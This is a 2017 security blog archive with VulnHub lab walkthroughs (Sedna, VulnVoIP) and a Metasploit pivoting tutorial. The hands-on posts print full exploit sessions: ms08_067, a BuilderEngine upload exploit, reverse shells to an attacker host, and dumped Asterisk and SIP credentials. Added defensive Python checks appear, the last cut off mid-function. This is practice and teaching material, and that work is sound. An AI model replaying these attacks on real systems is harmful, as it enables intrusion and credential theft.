Friday, June 23, 2017

Protecting Your Data

Time and time again, you hear the same advice: use a strong password, never reuse passwords, don't click on hyperlinks or suspicious attachments, install antivirus software, keep your software updated, don't post personal data publicly, yada, yada, yada. Most people don't give much thought to connecting to public WiFi hotspots. Almost everywhere we travel, the first thing we look for is a good WiFi with free Internet! We log on to our social media accounts, even do online banking, buy stuff online, etc. Behind that 'Free WiFi' might be a hotspot designed to steal your credentials or reroute your connections to a fake web server. It sounds ludicrous, but in reality such devices do exist and are actively deployed in public places. Why? Well, there are various reasons for doing it. People must understand that their personal data is very valuable for legitimate as well as illegitimate purposes. On the dark side, it can be used to steal identities, create fraudulent transactions, or even post personal and slanderous remarks using your credentials. In some countries this can get you in trouble with the law; it's called defamation. It can also be used to track your online habits and your location. Personal data can be stolen either by hijacking it during transmission or while it's at rest; data at rest is usually stolen from compromised hosts. Both scenarios can be avoided by employing strong encryption and safe online habits.

Data Transmission
But why should I bother if I'm connecting to an SSL-enabled website? Well, you should be cautious because SSL-enabled websites can be stripped/downgraded to plaintext using a technique called sslstrip. The way to make it difficult for malicious actors to hijack your data during transmission is to keep your data stream encrypted. A VPN offers one solution to the problem, but not a total one. A VPN connection will make it harder for threat actors to hijack your connections even at the LAN layer. TCP hijacks or MiTM attacks are easier to initiate from the LAN because there are fundamental protocol flaws at the switching layer, e.g. ARP spoofing. Also, it is easier to identify the intended target because the victims are usually in close physical proximity during this phase of the attack. Finally, it is trivial to plant malicious devices in the LAN, such as placing a tap just before the Internet gateway or rerouting packets.

Attack scenario 1 (diagram)

In attack scenario 1, the attacker host uses an ARP spoofing tool to poison the WiFi AP into redirecting the victim's traffic to the attacker, allowing the attacker to manipulate legitimate traffic, a precursor to a phishing conduit or even sslstrip attacks.

Attack scenario 2 (diagram)

In attack scenario 2, the WiFi AP is jammed and a rogue WiFi AP with the same SSID is set up to lure the victim host into connecting to it. Upon a successful handshake, all legitimate traffic is rerouted via the rogue AP for further manipulation such as sslstrip, phishing, credential theft, etc.

Having a dedicated VPN connection to encapsulate your connections will fundamentally make it almost impossible for a threat actor to hijack the data stream, because any modification to it will either render the payload useless thanks to the encryption cipher or break the packet's integrity check, which tears down the connection and cuts off further attacks.

Data at Rest
To steal data, it must be readable for it to be valuable. If the content is encrypted, it will be of little use to threat actors. Encrypting data at rest with strong encryption such as AES with asymmetric RSA keys grants recipients privacy by virtue of the fact that only the authorised recipients can decrypt the data, provided they hold the right public and private key pair along with a valid passphrase.

Conclusion
Next time you intend to transmit or store anything on a public network or server, give privacy a thought. Always think of who the rightful recipients are. Not everyone should have the same privilege to access your data. After all, it's called private for a reason: such info is unique to you and only you! E.g. credit card numbers, SSN, passport numbers, birth dates, telephone numbers, bank account numbers, user IDs/passwords, PIN codes, passphrases, your mother's maiden name, personal addresses, etc. During transmission of data, remember to check the URI address carefully and the server's SSL certificate. This can be done by clicking on your browser's lock sign in the URL bar. Never accept connections with a bad SSL cert. Lastly, keep your OS fully patched and never click on links that you are unsure of, that appear dubious, or that come from unknown sources.


Wednesday, June 21, 2017

Mobile Phone Security: Apple vs Android

There are more people glued to their mobile phones these days. They are shifting away from the PC to the mobile platform. It's a simple matter of convenience compared with lugging a 13" laptop on a sardine-packed commute.

When we talk about mobile phones, we generally have 2 major flavours: Android by Google and iOS by Apple. Many people argue that iOS is way more secure than Android; why is that? Well, for a start, I only allow my kids to use iOS devices, mainly because the only way to install apps on it is via the App Store. Apple has been pretty strict with this policy and I believe this is the main reason why it's more secure. Android, on the other hand, allows users to download from unknown sources such as standalone APK files that can be downloaded from anywhere. The same can be done on iOS if it is jailbroken, but that requires some level of work that most average people will not undertake unless they have a good reason to do so. Furthermore, jailbreaks for iOS are getting scarce as hackers are inclined to sell their wares rather than make them public.

From an OS architecture standpoint, I feel that both are fairly secure. Both OSes are built around multilayered sandboxes that control system interactions between the kernel and apps. Apple keeps its iOS source code private while Android is open source; the former relies on security through obscurity. There have been many bug bounties offered by both Google and Apple, some offering over USD 200k in cash for anyone who can produce a working remote exploit. In the open market, an iOS exploit can go for up to USD 1.5 million. The bounty is higher for iOS because Apple is known to be more 'secure' than Android. Even President Trump has switched from an Android to an Apple phone. Both Google and Apple have strict security screening for all apps that appear in their online stores; Google uses Bouncer to scan apps for malicious code, but lately we have heard of instances of Android apps infected by malware.

Another reason Apple is referred to as the more secure device is its patch management life cycle. iOS has only one variant used on all Apple phones; there are no 'modified by manufacturer' or cloned iOS variants. This makes it easier when it comes to pushing out updates to millions of users because there is only 1 iOS image to push. Android, on the other hand, has more than a dozen different mods, with each phone manufacturer free to add customisations to suit different phone models. This proves difficult when some manufacturers don't respond promptly after a major flaw is discovered, as each Android patch needs to be tailored to its phone model, or perhaps they simply don't take security seriously. Some phones become obsolete before the patch comes out. This leaves millions of Android users vulnerable to hacking. The last major flaw for Android was in its media processing function in ver 5.0, also known as Stagefright.

Apple signs each iOS package for a limited time. That means once you upgrade iOS, you can't downgrade if the previous iOS package has expired. This is to prevent users from reverting their security, as newer iOS packages generally come with improved security. Android, on the other hand, allows you to root the device (if the bootloader is not locked) by flashing it with custom Android images. While this is a good way to mod the phone for specialised purposes, it introduces a security risk, as modified images can introduce new bugs that can be exploited. Rooting the phone also grants the user full privileges over the kernel, thus bypassing the default security mechanisms that are there to prevent further hacking.

In a nutshell, it is clear which OS is more secure, but it is up to the end user to decide which platform suits them; perhaps budget constraints or flexibility are the major deciding factor. Holistically, security lies with end-user awareness. Simply clicking on a hyperlink can introduce malicious code that can take control of your phone remotely. Though it is way more difficult to exploit an Apple phone than an Android phone, it is not entirely impossible.

Saturday, June 17, 2017

Getting Around Multihome Hosts: Part I

So you successfully compromised your first host and it happened to be a dual-homed host. The next logical objective would be to move deeper into the network, which means reaching another host hiding behind a separate network. Here is a depiction of my situation:

<attacker host> -------------<host A> -------------------------<host B>
ip: 192.168.0.182         eth0: 192.168.0.191                    192.168.52.134
                                     eth1: 192.168.52.135

Basically, there are several methods of pivoting around the multihomed 'host A':

1. Using meterpreter autoroute & portfwd (win/lin)
2. Using sshd port forwarding & dynamic SOCKS (Win/lin)
3. Using plink port forwarding & dynamic SOCKS (win)

While there are many write ups on the web, I will summarize my experiences for each situation and its advantages and disadvantages. For the first option, you will need a working meterpreter session on host A.

For simplicity, we will assume that we already have a meterpreter session on host A; we set up a multi/handler listener to catch the shell:

Performed on Attacker Host:
msf > use exploit/multi/handler 
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.182    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.0.182:4444 
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.191
[*] Meterpreter session 1 opened (192.168.0.182:4444 -> 192.168.0.191:36774) at 2017-06-17 19:12:39 +0800 
meterpreter > 

Example autoroute:
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:2f:f8:cb
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.0.191
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe2f:f8cb
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : eth1
Hardware MAC : 00:0c:29:2f:f8:d5
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.52.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe2f:f8d5
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > 
Background session 1? [y/N]
msf exploit(handler) > use post/windows/manage/autoroute
msf post(autoroute) > show options 

Module options (post/windows/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf post(autoroute) > set session 1
session => 1
msf post(autoroute) > run

[*] Running module against hostA.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf post(autoroute) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 192.168.52.134
rhosts => 192.168.52.134
msf auxiliary(tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.52.134   yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > run

[*] 192.168.52.134:       - 192.168.52.134:139 - TCP OPEN
[*] 192.168.52.134:       - 192.168.52.134:135 - TCP OPEN
[*] 192.168.52.134:       - 192.168.52.134:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

With autoroute, you are limited to a TCP port scan, and it has to be done from within Metasploit. Upon identifying the open ports using autoroute, switch to portfwd. With portfwd you can run nmap -A (aggressive scan with OS and version detection) against the forwarded port to fingerprint the OS type for further attack.
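The subnet discovery that autoroute's autoadd performs above can be reproduced from the meterpreter `ifconfig` listing: each non-loopback interface's IPv4 address and netmask yields one CIDR network, and a host with more than one such network is a pivot candidate (or, from the defender's side, a dual-homed machine that deserves a closer look when reviewing inventory). The following is an added example, not code from the original post or from Metasploit; it parses a constructed copy of the `ifconfig` output shown earlier and approximates autoadd (which, as the module output says, reads the host's routing table) by deriving networks from the interfaces instead.

```python
import ipaddress
import re

# Constructed sample, trimmed from the meterpreter `ifconfig` layout shown above.
SAMPLE_IFCONFIG = """
Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:2f:f8:cb
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.0.191
IPv4 Netmask : 255.255.255.0

Interface  3
============
Name         : eth1
Hardware MAC : 00:0c:29:2f:f8:d5
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.52.135
IPv4 Netmask : 255.255.255.0
"""

INTERFACE_HEADER = re.compile(r"^Interface\s+\d+")


def parse_interfaces(text):
    """Split meterpreter ifconfig output into one {field: value} dict per 'Interface N' block."""
    interfaces = []
    current = None
    for line in text.splitlines():
        if INTERFACE_HEADER.match(line):
            current = {}
            interfaces.append(current)
            continue
        # Field lines look like 'IPv4 Address : 192.168.0.191'; '====' rules have no separator.
        if current is None or " : " not in line:
            continue
        key, _, value = line.partition(" : ")
        current[key.strip()] = value.strip()
    return interfaces


def reachable_subnets(text, skip_loopback=True):
    """Return the IPv4 networks the host's interfaces sit on, in CIDR form, in listing order."""
    subnets = []
    for iface in parse_interfaces(text):
        addr, mask = iface.get("IPv4 Address"), iface.get("IPv4 Netmask")
        if not addr or not mask:
            continue
        if skip_loopback and "LOOPBACK" in iface.get("Flags", ""):
            continue
        # strict=False lets ipaddress derive the network from a host address + dotted mask.
        net = ipaddress.IPv4Network(f"{addr}/{mask}", strict=False)
        subnets.append(str(net))
    return subnets


def is_multihomed(text):
    """True when the host bridges more than one distinct non-loopback network."""
    return len(set(reachable_subnets(text))) > 1


if __name__ == "__main__":
    for net in reachable_subnets(SAMPLE_IFCONFIG):
        print("route candidate:", net)
    print("multihomed:", is_multihomed(SAMPLE_IFCONFIG))
```

Run against the listing above this yields the same two /24 networks that autoroute added, which is a quick way to sanity-check the module's result before scanning.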

Example portfwd:
These steps are important: they map a local port to a remote port on host B, and the -r option names the remote host the traffic is relayed to:
 
meterpreter > portfwd add -l 445 -p 445 -r 192.168.52.134
[*] Local TCP relay created: :445 <-> 192.168.52.134:445
meterpreter > portfwd add -l 4444 -p 4444 -r 192.168.52.134
[*] Local TCP relay created: :4444 <-> 192.168.52.134:4444
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local         Remote               Direction
   -----  -----         ------               ---------
   1      0.0.0.0:445   192.168.52.134:445   Forward
   2      0.0.0.0:4444  192.168.52.134:4444  Forward

2 total active port forwards.

meterpreter > 
Background session 1? [y/N]  y
 
We put meterpreter session 1 on host A in the background for the time being. In another terminal, take a look at the netstat output:
 
# netstat -an | more
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
 
Notice that ports 4444 and 445 are now listening on 0.0.0.0 (every local address)? This means both services are reachable locally, with their traffic relayed through our session on host A. Therefore we need to set our remote targets to 127.0.0.1 (localhost), because connections to it will be routed to host B.
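From the defender's side, the netstat listing above is exactly the artefact that gives a relay away: a Linux host that suddenly accepts connections on 0.0.0.0:445 and 0.0.0.0:4444 is not running a service it was built for. The following is an added example (not from the original post) that parses `netstat -an` output and reports every listening socket that is not on a baseline of expected listeners, together with the reasons a responder would care about. The baseline `EXPECTED_LISTENERS`, the `SUSPECT_PORTS` watch-list and the sample listing are constructed for the demonstration.

```python
# Constructed sample in the `netstat -an` layout shown above, plus an established
# connection and an IPv6 listener so the parser has both kinds of line to handle.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.182:4444      192.168.0.191:36774     ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
"""

# Hypothetical baseline for this host: a loopback-only PostgreSQL and SSH.
EXPECTED_LISTENERS = {("127.0.0.1", 5432), ("::", 22)}

# Ports that, on a Linux box with no file-sharing role, usually mean a relay or
# tunnel endpoint rather than a real service (constructed watch-list).
SUSPECT_PORTS = {445: "SMB port on a non-Windows host", 4444: "Metasploit default handler port"}


def parse_listeners(text):
    """Return (address, port) for every TCP socket reported in LISTEN state."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        # Column layout: Proto Recv-Q Send-Q Local Foreign State
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6") or parts[5] != "LISTEN":
            continue
        # rpartition keeps IPv6 addresses such as ':::22' intact.
        addr, _, port = parts[3].rpartition(":")
        listeners.append((addr, int(port)))
    return listeners


def audit_listeners(text, expected=EXPECTED_LISTENERS):
    """Flag listeners that are not in the baseline, annotated with why they stand out."""
    findings = []
    for addr, port in parse_listeners(text):
        if (addr, port) in expected:
            continue
        reasons = ["not in baseline"]
        if addr in ("0.0.0.0", "::"):
            reasons.append("bound to all interfaces")
        if port in SUSPECT_PORTS:
            reasons.append(SUSPECT_PORTS[port])
        findings.append({"addr": addr, "port": port, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_listeners(SAMPLE_NETSTAT):
        print(f"{f['addr']}:{f['port']}  " + "; ".join(f["reasons"]))
```

The same check works on `ss -ltn` output with a different column index; the point is that a baseline of expected listeners, compared on every host, turns a port forward into an alert rather than background noise.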
 
But before we can choose an exploit for host B, let's identify it using nmap. Since we know that port 445 is open on host B and is now forwarded to our localhost, let's use it:
 
# nmap -p 445 -A 127.0.0.1

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-17 19:42 SGT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00011s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 15h29m28s, deviation: 0s, median: 15h29m28s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: tt-af6d434411ff
|   NetBIOS computer name: TT-AF6D434411FF
|   Workgroup: WORKGROUP
|_  System time: 2017-06-17T20:12:26-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds 
 
Great! So we know it is a Windows XP box! Let's use the ms08_067_netapi exploit; remember that our rhost for both the exploit and payload is now 127.0.0.1:
 
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    127.0.0.1        yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     127.0.0.1        no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] Sending stage (957487 bytes) to 127.0.0.1
[*] 127.0.0.1:445 - Automatically detecting the target...
[*] 127.0.0.1:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] 127.0.0.1:445 - We could not detect the language pack, defaulting to English
[*] 127.0.0.1:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 127.0.0.1:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 2 opened (127.0.0.1:40699 -> 127.0.0.1:4444) at 2017-06-17 19:18:18 +0800

meterpreter > shell
Process 484 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

There you go! You now have a meterpreter session on host B. It is important to note the different usage of autoroute and portfwd with meterpreter, each designed for different scenarios.

If you don't have the luxury of using meterpreter, you may opt for the 2nd or 3rd option. I'll cover that topic in my next posting.

Wednesday, June 14, 2017

VulnHub: Sedna Walkthru

Sedna is a rather straightforward VM. I found it a great way to practice and sharpen pentesting skills, and similar to some of the hosts in the PWK lab sessions. So if you are looking for something outside the labs for practice, this box is a good one. It did require a bit of enumeration; the remote exploitation was easier than the local privilege escalation, and I'm guessing the author added a little twist for added challenge and, of course, fun ;-)

Credits to Viper for contributing this fantastic VM. If you are interested, you can d/l it here.

1. Start with a port scan and play around with the nmap flags. Look out for port knocking, as some hosts will only reveal their ports if you hit them in a certain sequence.


2. Rule of thumb: if you see a web port, enumerate it, because this is where you are most likely to find some good stuff. It is also easier to enumerate than other services; we all use the web for browsing, so it comes naturally. Always go for the low-hanging fruit.

dirb http://192.168.0.113/ -w -o dirb.txt
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: dirb.txt
START_TIME: Wed Jun 14 11:30:51 2017
URL_BASE: http://192.168.0.113/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4614

---- Scanning URL: http://192.168.0.113/ ----
==> DIRECTORY: http://192.168.0.113/blocks/
==> DIRECTORY: http://192.168.0.113/files/
+ http://192.168.0.113/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://192.168.0.113/modules/
+ http://192.168.0.113/robots.txt (CODE:200|SIZE:36)
+ http://192.168.0.113/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.0.113/system/
==> DIRECTORY: http://192.168.0.113/themes/ 
<--snip--snip-->
 
3. Found BuilderEngine at http://192.168.0.113/modules/builder_market/license.txt

4. I found 2 exploits on exploit-db.com, took the easy way and used the msf module :-). You can d/l it here.

msf exploit(42025) > info 

       Name: BuilderEngine Arbitrary File Upload Vulnerability and execution
     Module: exploit/linux/misc/42025
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-18

Provided by:
  metanubix
  Marco Rivoli

Available targets:
  Id  Name
  --  ----
  0   BuilderEngine 3.5.0

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.0.113    yes       The target address
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to BuilderEngine
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a vulnerability found in BuilderEngine 3.5.0 
  via elFinder 2.0. The jquery-file-upload plugin can be abused to 
  upload a malicious file, which would result in arbitrary remote code 
  execution under the context of the web server.

References:
  https://www.exploit-db.com/exploits/40390

msf exploit(42025) > run

[*] Started reverse TCP handler on 192.168.0.182:4444 
[+] Our payload is at: OccVNRFDJjYA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.0.113
[*] Meterpreter session 1 opened (192.168.0.182:4444 -> 192.168.0.113:51443) at 2017-06-14 12:14:42 +0800
[+] Deleted OccVNRFDJjYA.php
id

meterpreter > shell
Process 12629 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$ 
 
5. Now for the privilege escalation part. I'd been trying various overlayfs exploits but none seemed to work because /bin/su was removed. After some googling for Ubuntu 14.04 local priv exploits, I found the apport package to be vulnerable. You can d/l it here.


Monday, June 12, 2017

HackLAB: VulnVoIP Walkthru


I found this vulnhub challenge rather unique, mainly because it is a VoIP box waiting to be 0wned. You don't see many of these around, so I got down and dirty with the fun stuff :-)

My approach is slightly different from the other walkthrus as I did not use the SIPVicious toolset. Instead, I owned the box pretty fast after discovering it's vulnerable to an RCE condition. The exploit worked with very little modification to its original code.

In case anyone is interested, you can download the VulnVoIP VM here.

1. Nmap output: 
 

2. Browsing to http://192.168.0.168/recordings/index.php indicates FreePBX ver 2.5.

 
3. Download FreePBX exploit. 

4(a). Set up a netcat listener to catch the shell:

# nc -nlvp 443
listening on [any] 443 ...

4(b). Modify the sploit for http instead of https, configure the rhost and lhost, then execute it.

5. Catch the shell and spawn a proper TTY using python:
listening on [any] 443 ...
connect to [192.168.0.182] from (UNKNOWN) [192.168.0.168] 50752
id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2# id
id
uid=0(root) gid=0(root)
bash-3.2# 

6. Get the asterisk password using the spawned shell:

bash-3.2# cat /etc/asterisk/manager.conf
cat /etc/asterisk/manager.conf
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
; 
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
#include manager_custom.conf 
<--snip---snip-->

7. Log in to the Asterisk manager interface (AMI) on port 5038 using 'admin' with pass 'amp111':

# telnet 192.168.0.168 5038
Trying 192.168.0.168...
Connected to 192.168.0.168.
Escape character is '^]'.
Asterisk Call Manager/1.1
ACTION: LOGIN
USERNAME: admin
SECRET: amp111
EVENTS: ON

Response: Success
Message: Authentication accepted
 
8. Enumerate the SIP users:

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT       
100                                                          from-internal    Yes  Always    
101                        s3cur3                            from-internal    Yes  Always    
102                        letmein123                        from-internal    Yes  Always    
201                        secret123                         from-internal    Yes  Always    
200                        quit3s3curE123                    from-internal    Yes  Always    
2000                       password123                       from-internal    Yes  Always    
--END COMMAND--

9. Look for voicemail boxes:

action: VoicemailUsersList 

Response: Success
Message: Voicemail user list will follow

Event: VoicemailUserEntry
VMContext: default
VoiceMailbox: 2000
Fullname: Support
Email: 
Pager: 
ServerEmail: 
MailCommand: 
Language: 
TimeZone: 
Callback: 
Dialout: 
UniqueID: 
ExitContext: 
SayDurationMinimum: 2
SayEnvelope: No
SayCID: No
AttachMessage: No
AttachmentFormat: 
DeleteMessage: No
VolumeGain: 0.00
CanReview: Yes
CallOperator: Yes
MaxMessageCount: 100
MaxMessageLength: 0
NewMessageCount: 1

Event: VoicemailUserEntryComplete

10(a). Using any VoIP client, configure it for SIP: 2000@192.168.0.168 pass: password123

10(b). Place a call to SIP 2000 and listen for voicemail! ;-) It's engaged! Of course, because I'm dialing my own number. Now, figure out how to retrieve my own voicemail box.

11. A little googling about 'asterisk voicemail retrieval number' told me that it can be accessed by pressing *98. Later I found that you can actually press * too.

12. The voicemail box requires a password!!! Using the existing shell, I searched /etc/asterisk/voicemail.conf for it:

bash-3.2# pwd
pwd
/etc/asterisk
bash-3.2# ls voicemail*
ls voicemail*
voicemail.conf voicemail.conf.template
bash-3.2# cat voicemail.conf
cat voicemail.conf
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
bash-3.2# 
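Steps 6 and 12 show the configuration mistakes that let this box fall over once a shell was obtained: an AMI account with a six-character secret, permit=0.0.0.0/0.0.0.0 and write access to `command` on a manager interface bound to every address, and a voicemail box whose PIN is 0000. The following is an added example, not part of the original walkthrough, that parses Asterisk's INI-style files and reports those weaknesses so they can be caught before a pentester does; the two samples are constructed copies trimmed from the files above, and the minimum secret length and weak-PIN list are my own thresholds, not Asterisk defaults.

```python
import re

# Constructed sample trimmed from the manager.conf shown in step 6.
SAMPLE_MANAGER_CONF = """\
;
; AMI - Asterisk Manager interface
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
"""

# Constructed sample trimmed from the voicemail.conf shown in step 12.
SAMPLE_VOICEMAIL_CONF = """\
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
"""

MIN_SECRET_LEN = 12                                   # my threshold, not an Asterisk default
WEAK_PINS = {"0000", "1111", "1234", "4321", "0123"}  # constructed shortlist

SECTION_RE = re.compile(r"^\[([^\]]+)\]$")
KV_RE = re.compile(r"^([^=]+?)\s*=>?\s*(.*)$")


def parse_asterisk_conf(text):
    """Parse Asterisk's INI-like format into {section: [(key, value), ...]}.
    Comments (';'), blank lines and '#include' directives are skipped; both the
    'key = value' and 'key => value' forms are accepted and duplicate keys are kept."""
    sections, section = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("#include"):
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            sections.setdefault(section, [])
            continue
        m = KV_RE.match(line)
        if m and section is not None:
            sections[section].append((m.group(1).strip(), m.group(2).strip()))
    return sections


def audit_manager_conf(text):
    """Report AMI exposure problems: wildcard bind, wildcard permit, short secrets, 'command' write access."""
    findings = []
    conf = parse_asterisk_conf(text)
    general = dict(conf.get("general", []))
    if general.get("enabled", "no").lower() == "yes" and general.get("bindaddr") == "0.0.0.0":
        findings.append("[general] AMI bound to all interfaces; use bindaddr=127.0.0.1 unless remote AMI is required")
    for name, items in conf.items():
        if name == "general":
            continue
        acct = dict(items)
        if acct.get("permit", "").startswith("0.0.0.0/"):
            findings.append(f"[{name}] permit={acct['permit']} accepts any source address")
        secret = acct.get("secret", "")
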